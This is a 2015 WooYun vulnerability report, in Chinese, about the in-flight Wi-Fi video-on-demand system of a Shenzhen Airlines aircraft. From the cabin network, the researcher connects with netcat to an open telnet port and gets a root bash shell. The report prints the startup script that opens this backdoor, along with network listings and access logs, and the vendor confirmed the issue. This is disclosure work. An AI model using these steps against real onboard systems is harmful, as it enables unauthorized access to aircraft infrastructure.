当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0143525

漏洞标题:深圳航空某飞机上云图wifi存在后门可被控制点播系统(一定条件可连接内部网络)

相关厂商:深圳航空

漏洞作者: 路人甲

提交时间:2015-09-26 01:37

修复时间:2015-11-10 14:00

公开时间:2015-11-10 14:00

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-26: 细节已通知厂商并且等待厂商处理中
2015-09-26: 厂商已经确认,细节仅向厂商公开
2015-10-06: 细节向核心白帽子及相关领域专家公开
2015-10-16: 细节向普通白帽子公开
2015-10-26: 细节向实习白帽子公开
2015-11-10: 细节向公众公开

简要描述:

坐飞机无聊啊

详细说明:

连上深圳航空的云图之后发现深处一个网络通过192.168.2.99进行访问云图

nc -vv 192.168.2.2 23
found 0 associations
found 1 connections:
1:flags=82<CONNECTED,PREFERRED>
outif en0
src 192.168.2.88 port 59300
dst 192.168.2.2 port 23
rank info not available
TCP aux info available
Connection to 192.168.2.2 port 23 [tcp/telnet] succeeded!
????????
bash-3.00#


什么鬼这是,直接连上?

netstat -an
netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:8554 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8300 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
tcp 0 0 192.168.2.2:8080 192.168.2.99:60361 TIME_WAIT
tcp 0 0 192.168.2.2:8080 192.168.2.99:60440 TIME_WAIT
tcp 0 0 192.168.2.2:8080 192.168.2.99:60726 TIME_WAIT
tcp 0 0 192.168.2.2:42675 192.168.2.99:7890 ESTABLISHED
tcp 0 547 192.168.2.2:23 192.168.2.88:59300 ESTABLISHED
tcp 0 0 192.168.2.2:8080 192.168.2.99:60519 TIME_WAIT
tcp 0 0 192.168.2.2:38879 192.168.2.99:8911 ESTABLISHED
tcp 0 0 192.168.2.2:42679 192.168.2.99:7890 ESTABLISHED
tcp 0 0 192.168.2.2:8080 192.168.2.99:60596 TIME_WAIT
tcp 0 0 192.168.2.2:38878 192.168.2.99:8911 ESTABLISHED
tcp 0 0 192.168.2.2:8080 192.168.2.99:60663 TIME_WAIT


看看代码

cat *.sh
cat *.sh
#!/bin/sh
echo "================Enter runapp.sh========================="
#start the telnetd service;
telnetd -l /bin/bash
cp /tango/pointercal /etc
#insmod the sata/usb ko
modprobe sata_tango3
modprobe tangox-ehci-hcd
modprobe usb-storage
echo "================Build /tmp/sda2 directory========================="
mkdir /tmp/sda2
mkdir /tmp/sda3
mkdir /mnt/sdk
mkdir /mnt/nfs
mount /dev/sda2 /tmp/sda2
mount /dev/sda3 /tmp/sda3
/tmp/sda2/avod/AppStart.sh
cat /tmp/sda2/avod/AppStart.sh
cat /tmp/sda2/avod/AppStart.sh
#!/bin/sh
if [ ! -d "/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/" ]; then
mkdir /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/ -p
fi
#firmware
if [ -d "/tmp/sda2/newfw" ] && [ -d "/tmp/sda2/newfw/release/avod" ] &&
[ -d "/tmp/sda2/newfw/sdk" ] && [ -d "/tmp/sda2/newfw/release/mini_httpd" ] &&
[ -d "/tmp/sda2/newfw/release/wwwroot" ] ;then
#&& [ -d "/tmp/sda2/newfw/sdkavod" ]
echo "Found new firmware..."

rm /tmp/sda2/avod -rf
mv /tmp/sda2/newfw/release/avod /tmp/sda2/ -f
chmod 777 /tmp/sda2/avod -R

if [ -d "/tmp/sda2/newfw/release/conf" ] ;then
rm /tmp/sda2/conf -rf
mv /tmp/sda2/newfw/release/conf /tmp/sda2/conf -f
chmod 777 /tmp/sda2/conf -R
fi

rm /tmp/sda2/sdk -rf
mv /tmp/sda2/newfw/sdk /tmp/sda2/ -f

#Only for Browser upgrade
if [ -d "/tmp/sda2/newfw/sdkavod" ] ;then
rm /tmp/sda2/sdkavod/install -rf
rm /tmp/sda2/sdkavod/lib -rf
mv /tmp/sda2/newfw/sdkavod/install/ /tmp/sda2/sdkavod/ -f
mv /tmp/sda2/newfw/sdkavod/lib/ /tmp/sda2/sdkavod/ -f
fi

# rm /tmp/sda2/sdkavod -rf
# mv /tmp/sda2/newfw/sdkavod /tmp/sda2/ -f
rm /tmp/sda3/mini_httpd -rf
mv /tmp/sda2/newfw/release/mini_httpd /tmp/sda3/mini_httpd
chmod 777 /tmp/sda3/mini_httpd -R

rm /tmp/sda3/wwwroot -rf
mv /tmp/sda2/newfw/release/wwwroot /tmp/sda3/wwwroot
chmod 777 /tmp/sda3/wwwroot -R

rm /tmp/sda2/newfw -rf
sync

if [ ! -d "/tango/conf/" ] ;then
mkdir /tango/conf -p
fi

if [ -f "/tmp/sda2/update/system_version_info.xml" ] ;then
cp /tmp/sda2/update/system_version_info.xml /tango/conf -f
else
echo "--->>ERR:can not find system version file"
fi
#add update kernel
echo "begin to update firmware!"
/tmp/sda2/avod/updatefirmware.sh
source /tango/release/runapp.sh
echo "Firwmare update success!"
exit
fi
cd /tmp/sda2/sdkavod/mrua
source run.env
fw_reload
#mkdir /home/antony
ln -s /tmp/sda2/sdkavod/lib /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib
ln -s /tmp/sda2/sdkavod/install /home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/install
export LD_LIBRARY_PATH=/home/antony/vscu/dtv_382/qt4.5_sdk3.8/qt_SMP86xx_src_4.5.2-1.1/build-release/lib:$LD_LIBRARY_PATH
#for cmt smartlcd
#cp /tmp/sda2/avod/libdrvMrua_usb_cmt.so /lib/libdrvMrua.so
cp /tmp/sda2/avod/libdrvMrua_12inch.so /lib/libdrvMrua.so
#cp log lib
echo "copy log lib"
cp /tmp/sda2/avod/liblog.so /lib/ -f
cp /tmp/sda2/avod/libcurl.so.4 /lib/ -f
export QWS_DISPLAY=linuxfb
export QWS_SIZE=1280x800
export QWS_MOUSE_PROTO=linuxtp
cd /tmp/sda2/sdkavod/dcchd_SMP8652_3_8_2_black.mips/
source trun.env
cd /tmp/sda2/avod
# for cmt
ln -sf PD035Vx2.vmf.cmt PD035Vx2.vmf
#leib++ for parse the ipaddr from the /tango/avod/ipaddr.cfg
#/tmp/sda2/avod/ipconfig.sh
#udhcpc -q&
#use fixed ip 192.168.2.2
/sbin/ifconfig eth0 192.168.2.2 up
/tmp/sda3/mini_httpd/sbin/mini_httpd -C /tmp/sda3/mini_httpd/mini.conf &
echo "starting control module ....."
/tmp/sda2/avod/control_module &
sleep 10
route add -net 224.0.0.0 netmask 240.0.0.0 dev eth0
sleep 5
echo "starting play_sub_module ....."
/tmp/sda2/avod/play_sub_module &
sleep 10
echo "starting browser ....."
/tmp/sda2/avod/browser -size 1280x800 -qws http://127.0.0.1/cmt_welcome/welcome.html &
cp -rf /tmp/sda2/avod/ppp /etc/
cp -rf /tmp/sda2/avod/ppp/resolv.conf /etc/
cp -f /tmp/sda2/avod/pppd /usr/sbin
cp -f /tmp/sda2/avod/chat /usr/sbin
route del -net default
sleep 5
echo "start 3g_control module"
/tmp/sda2/avod/3g_control&
sleep 10
echo "starting cmt_cma_module ....."
/tmp/sda2/avod/cmt_cma_module &
echo "starting pcu_comm_module ....."
/tmp/sda2/avod/pcu_comm_module &
echo "starting upgradeModule ....."
/tmp/sda2/avod/upgradeModule &
echo "starting cmt_suu ....."
/tmp/sda2/avod/cmt_suu &
#add by hirry for ftpd
echo "star ftpd ....."
/tmp/sda2/avod/ftp/autoftpd.sh
#end by hirry for ftpd
sleep 5
modprobe snd_seq_oss
modprobe snd_pcm_oss
sleep 2
echo "starting wis-streamer ...."
/tmp/sda2/avod/wis-streamer -pcm -nv &
#cp /tmp/sda2/avod/resolv.conf /etc/ -f
LD_LIBRARY_PATH=/lib:/usr/lib/:/usr/local/lib:$LD_LIBRARY_PATH
echo "Starting logmodule ......"
/tmp/sda2/avod/logmodule_cmt &
echo "Starting bitemodule ....."
/tmp/sda2/avod/bitemodule_cmt &
echo "Starting proxysyn_mips..."
/tmp/sda2/avod/proxysyn_mips &
#echo "Starting neusoft dldir..."
#/tmp/sda3/wwwroot/neusoft/ok/dldir/dldir &
echo "Starting nginx..."
/tmp/sda3/wwwroot/nginx/sbin/nginx -p /tmp/sda3/wwwroot/nginx/ &
echo "all application booted ....."
find /tmp/sda2/avod/logs -mtime +15 -name "*log" -exec rm -f {} \;
#add copy kernel
/tmp/sda2/avod/copykernel.sh&
killall mini_httpd


原来的确是个vod点播系统啊,另外从日志里看一定时候是可以访问10网络的

192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/download/20150923000001024616.d.icup HTTP/1.1" 206 358560 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:08 +0800] "GET /Air/checkFileSize/20150923000001024615.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:09 +0800] "GET /Air/checkFileSize/20150923000001024616.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/download/20150923000001024617.d.icup HTTP/1.1" 206 163522 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "GET /Air/checkFileSize/20150923000001024617.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:11 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024617.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:12 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024615.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:13 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024616.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:41 +0800] "GET /Air/download/20150923000001024619.d.icup HTTP/1.1" 206 343755 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:42 +0800] "GET /Air/download/20150923000001024618.d.icup HTTP/1.1" 206 540360 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024619.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:44 +0800] "GET /Air/checkFileSize/20150923000001024618.d.icup HTTP/1.1" 200 7 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:45 +0800] "GET /Air/download/20150923000001024620.d.icup HTTP/1.1" 206 452793 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:46 +0800] "GET /Air/checkFileSize/20150923000001024620.d.icup HTTP/1.1" 200 6 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:47 +0800] "GET /Air/download/20150923000001024622.d.icup HTTP/1.1" 206 98965 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "POST /Air/done?FlightNo=B5109&FileName=20150923000001024620.d.icup HTTP/1.1" 200 26 "-" "Mozilla/5.0 (Windows NT 5.1; rv:19.0) Gecko/20100101 Firefox/19.0"
192.168.2.99 - - [23/Sep/2015:14:53:48 +0800] "GET /Air/checkFileSize/20150923000001024622.d.icup HTTP/1.1" 200 5 "-" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"


漏洞证明:

telnetd -l /bin/bash

是后门?

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-26 13:59

厂商回复:

感谢您对深航信息系统的关心,已安排人员修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-09-26 12:16 | 草榴社区 ( 普通白帽子 | Rank:109 漏洞数:26 | 未满18周岁,不准进入.)

    深圳航空这么6.还有WIFI那

  2. 2015-09-26 18:34 | Yang ( 普通白帽子 | Rank:315 漏洞数:102 | 作为菜鸟,大米手机摔破了怎么办?)

    豪,竟然坐上飞机了。